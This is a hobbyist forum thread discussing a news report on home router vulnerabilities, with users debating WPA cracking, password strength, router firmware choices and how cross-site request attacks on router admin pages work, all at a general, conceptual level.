![[H]ard|Forum](/styles/hardforum/xenforo/logo_dark.png){kind=logo}
Home Wi-Fi Routers Are Easily Hackable
- Thread starter HardOCP News
- Start date
Astronomica
Gawd
- Joined
- Sep 18, 2008
- Messages
- 755
Anyone who does pentesting isn't suprised or even interested in this. A few long nights of research and a little knowhow with linux and the wireless world is yours for the taking, if your patient enough.
thewooster
Gawd
- Joined
- Jan 12, 2006
- Messages
- 512
DDWRT, and configure your router propety; no worries 
.
.PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
WPA hasn't been cracked. Very few people use WEP anymore.
thewooster
Gawd
- Joined
- Jan 12, 2006
- Messages
- 512
That is not entirely true. There have been tools out to crack WPA for quite some time now (especially if using TKIP as opposed to AES). A badly configured router using WPA can be cracked in as little as ten minutes (usually much longer, but still). Also, a very surprisingly large number of home users still use WEP; this should not be the case, but most people don't know the difference and just go with whatever their router defaults to.
PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
Yeah i'm aware of WPA1 being vulnerable if using TKIP but when it comes to WPA AES or WPA2 there's nothing. I just don't think someone with pentesting and "Linux experience" has the "wireless world for the taking" as he put it.
GaryJohnson
[H]ard|Gawd
- Joined
- Feb 1, 2010
- Messages
- 1,053
That isn't a problem with the routers though, it's a problem with the user clicking the malicious link and the browser allowing cross-site requests.
sliverjazz
Gawd
- Joined
- Jun 9, 2004
- Messages
- 747
I always think of Crisco when I see Cisco.
Cisco Router always makes me think of Sysco Chowder.
Which is fitting because Cisco is to networking what Sysco is to the food-supply industry.
thewooster
Gawd
- Joined
- Jan 12, 2006
- Messages
- 512
You would be surprised
. Though yes, as you say much of it does depend on the user simply not using bad settings, but even a misconfigured WPA2 can be "hacked." And of course if you use a bad key or poor password no security measure is going to help you .temujin987
[H]ard|Gawd
- Joined
- Jun 24, 2008
- Messages
- 1,351
my netgear router also has so many other issues that I decided to install open-wrt this weekend. i'm not even sure if wps is disabled. the checkbox is gone, but the button is still illuminated. i also would like to use my printer on the usb port like on my old zyxel router instead of just storage media. i hope this can be fixed by software.
Haha, I have the same basic setup as you. 2 UniFi Pro WAPs and pfSense. I ditched my Cisco/Linksys combo a LONG time ago.
DDWRT, and configure your router propety; no worries
http://hardforum.com/showthread.php?t=1437847
Anyone can make careless mistakes. You just need to be immediate with your action when they are found.
Disable WPS and use AES. Fixed.
rudy
[H]F Junkie
- Joined
- Apr 4, 2004
- Messages
- 8,704
lol yep its like people saying I don't have a virus because I don't run AV and I don't feel anything. All the routers are made by a handful of companies and you know they reuse code on all of them as much as they can.
Ur_Mom
Fully [H]
- Joined
- May 15, 2006
- Messages
- 20,689
I still see some DD-WRT stuff running root/admin passwords....
I use pfSense now. Password would be a bit difficult to guess. I'm sure with enough brute force, though, it could be done. Just like most other passwords.
I do plan on going with a Cisco router sometime, though. I'm already running a nice Cisco Gb switch (3560E) and need a good router to go with it.
I use pfSense now. Password would be a bit difficult to guess. I'm sure with enough brute force, though, it could be done. Just like most other passwords.
I do plan on going with a Cisco router sometime, though. I'm already running a nice Cisco Gb switch (3560E) and need a good router to go with it.
PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
No password should be easily guessable these days, especially a network pass. Mine is over 25 characters long and a mix numbers, letters, and symbols. Just pick a quote or a line from a poem and mix in some 1337 and you're good to go. Long ass complicated password + its real easy to remember. Brute force proof.
Ur_Mom
Fully [H]
- Joined
- May 15, 2006
- Messages
- 20,689
Nothing is completely safe. Sure, it may take a long time (especially when you lock it out after x attempts), but it's not impossible.
Mine is something like this: Mg5#2mcT (not even close to what it is, but you get the idea). So, I guess I could write a simple script to start guessing, but it'd still take a while. If they want into my network that bad, go for it. There is really nothing that is that special, anyway. If you want a copy of my porn folder, give me a 500 GB HDD and I'll copy it for you.
I guess if I had mission critical stuff, I'd secure it a bit more, but for a home user with very little stuff on my network (sure, taxes and stuff, but that's nothing huge), I'm fine.
PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
So basically its an ~8 character password with random letters/numbers/symbols. IE its short and hard to memorize. Really the most secure thing about it is the fact that it has a password in the first place and it blends in with other networks, ie security by obscurity. But it must be annoying to have to write it down, so here lets do you a favor.
Ur_Mom's_New_Passw0rd_Ownz!
There you go, much more secure and easy to remember
Ur_Mom
Fully [H]
- Joined
- May 15, 2006
- Messages
- 20,689
So basically its an ~8 character password with random letters/numbers/symbols. IE its short and hard to memorize. Really the most secure thing about it is the fact that it has a password in the first place and it blends in with other networks, ie security by obscurity. But it must be annoying to have to write it down, so here lets do you a favor.
Ur_Mom's_New_Passw0rd_Ownz!
There you go, much more secure and easy to remember
That would be a very secure password. But, I've memorized the other one. Never wrote it down. After you type it in a few times, you memorize it. That's just for the router, though. I have other passwords for other things, depending on the security I need. If it's for some web site with nothing interesting, it's a simple password. If it's something that needs more protection, it's a better password.
My work password, though, is similar to what you said. A phrase with some extra characters. Although, to be honest, it isn't that great. Every 90 days we change passwords. So, the number within my password is incremented rather than a whole new password. It's not the best way to do it, but otherwise I'd write it down....
PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
That's not a bad idea, keeps the original easy to remember phrase in tact, maintains a long password length, and fulfills the "change your password" requirement.
![Zarathustra[H]](https://cdn.hardforum.com/data/avatars/m/9/9298.jpg?1707758471){kind=avatar}
Zarathustra[H]
Extremely [H]
- Joined
- Oct 29, 2000
- Messages
- 38,866
Funny, my home router isn't on that list...I wonder why..
Cisco 892-W..
Nor is mine
pfSense 2.0.3
Zarathustra[H]
Extremely [H]
- Joined
- Oct 29, 2000
- Messages
- 38,866
I've got that same combination:
1.) pfSense as a router and firewall on my ESXi box
2.) Unifi LR Wireless AP
Tied together using a HP ProCurve 1810G-24 managed layer 2 switch.
Now, anything is hackable if someone has sufficient talent, time and determination, I'm just thinking my setup makes it easier for some random attacker to go for the neighbors instead
Zarathustra[H]
Extremely [H]
- Joined
- Oct 29, 2000
- Messages
- 38,866
Seems like this is a popular combo!
Red Squirrel
[H]F Junkie
- Joined
- Nov 29, 2009
- Messages
- 9,211
If it is correct in what i saw on the linksys page with proof of concept they have to do this :
So if you don't go browsing on webpages that are designed to hack your router there is no worry
How do I know which webpage on the WWW is designed to hack your router. Every link send to you by email which you have no clue about but sounds like it is legit
Hahaha that is quite a very specific situation there. How often does one leave the admin page for their router open and go on random websites. The issue is not that the router has an exploit, but that the browser has an exploit allowing web pages to tell it to execute code on another page. I'm sure this same exploit could also be used to make transactions on your bank if you have your bank's site open and go to such a site that is designed for that specific bank. It's time for browser makers to stop screwing around and actually make them secure. Browsers should not be able to execute arbitrary code or interact with other web pages that are open in it.
So is this article pretty much sillyness like that then? I figured it was real hacking like being able to set a specific packet to the router or that there was some kind of back door that then enabled someone to gain full access.
http://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20130318-type4
http://www.csoonline.com/article/73...ssword-encryption-in-its-ios-operating-system
Even Cisco does stupid things sometimes. Cliffs: A flaw they introduced in a new encryption algorithm makes that version suspectable to brute force attacks. They considered it a non issue until customers started to complain.
If you bothered to READ the article, it says it's done by creating hacked web or email that hijack the credentials from your browser or session. You never enter them, it is stealth and then it opens up whatever it wants and you have no idea.
it's vulnerable. If someone wants in and has the time they can break in. Knowing a tiny bit about the password or what the login contains can vastly reduce the time.
for instance most wpa2 ISP modems/routers are crackable within a few hours.
if you have the right equipment you over power the device with a stronger radio and capture a handshake and bruteforce that.
almost everything cisco does is unnecessarily complicated. it's security through obscurity and obfuscation.
I didn't even know about this. But I do now. Thanks.
PornoSatan
2[H]4U
- Joined
- Sep 3, 2004
- Messages
- 3,493
Why would you need to "overpower the device with a stronger radio"? That doesn't even make sense and leads me to believe you're speaking BS.
Means he wants to over power you by turning the volume up on his radio and brute force a hand shake out of you, lol.
ViperPrime
Limp Gawd
- Joined
- Oct 25, 2012
- Messages
- 158
here's the list...
I have a feeling that people don't understand what the issue is here. No, hackers don't need to know the password. Changing passord or making it complicated won't prevent router hijacking.
Authenticated attack means that the victim has a live session to the router's management screen open. Fake links from another broswer tab can invoke commands to the router's management tab.
Unauthenticated attack means that the victim does not have a live session to the router's management screen open. Fake links on a web page can invoke commands directly to the router.
Trivial attack means that no human interaction is needed.
All these attacks are capable of changing the password of the router, or gain control to the router without the need of the existing password.
Remote Adversary means that the router allows Remote Management Off. Local Adversary means Remote Management On or attackers have access to computers within the network.
In simple terms, all you need to do is to click an ad link on tab 1 just to see what kinds of deals you may get and Bam, your router got hijacked and you didn't even know it, it is what the problem is.
Authenticated attack means that the victim has a live session to the router's management screen open. Fake links from another broswer tab can invoke commands to the router's management tab.
Unauthenticated attack means that the victim does not have a live session to the router's management screen open. Fake links on a web page can invoke commands directly to the router.
Trivial attack means that no human interaction is needed.
All these attacks are capable of changing the password of the router, or gain control to the router without the need of the existing password.
Remote Adversary means that the router allows Remote Management Off. Local Adversary means Remote Management On or attackers have access to computers within the network.
In simple terms, all you need to do is to click an ad link on tab 1 just to see what kinds of deals you may get and Bam, your router got hijacked and you didn't even know it, it is what the problem is.
No problem...lol...all one has to do is update their browser, then all is right with the world again.
Zarathustra[H]
Extremely [H]
- Joined
- Oct 29, 2000
- Messages
- 38,866
There is very little having an updated browser can do to limit malicious links. yes, certain browsers are sandboxed, have their own JAVA implementations, etc. etc, but at the end of the day, a malicious link can still be created.
This is why it is so VERY important to run with UAC turned on, and not run your user account as admin (maintain a separate admin account for local machine admin, and keep your primary user account limited). At least then you have a chance of protecting your local computer, as you know not to input a password, if you didn't specifically request making a change.
Links like these are the most common forms of successful exploits, because they work. No firewall will prevent them as they are a request from inside the LAN., and even seasoned internet/tech veterans are often fooled by realistic looking webpages and links.
One might argue that randomly clicking a link designed to take over your specific router, just when you have an authenticated session to it open, may be a bit of a stretch, but think about it.
Make an instructional website. "How to enable uPNP to make your Xbox games work on router XX", instruct them to log in, and bring up some arbitrary screen on the router, and "follow this link to the next page", and BAM!
RangerXML
Supreme [H]ardness
- Joined
- Apr 16, 2006
- Messages
- 6,402
Home Wifi routers, easily hacked, is anyone really surprised at this fact? They are designed for easy of use, not security.
Red Squirrel
[H]F Junkie
- Joined
- Nov 29, 2009
- Messages
- 9,211
What's more worrysome is that this is even possible through a browser. it has nothing to do with the routers but the browser itself. If executing such code is possible then nothing stops a malicious site code writer to do something that will make transactions if you happen to have a tab open with your online banking for example. Browser makers really need to secure their shit. It's insane how full of security holes browsers are now.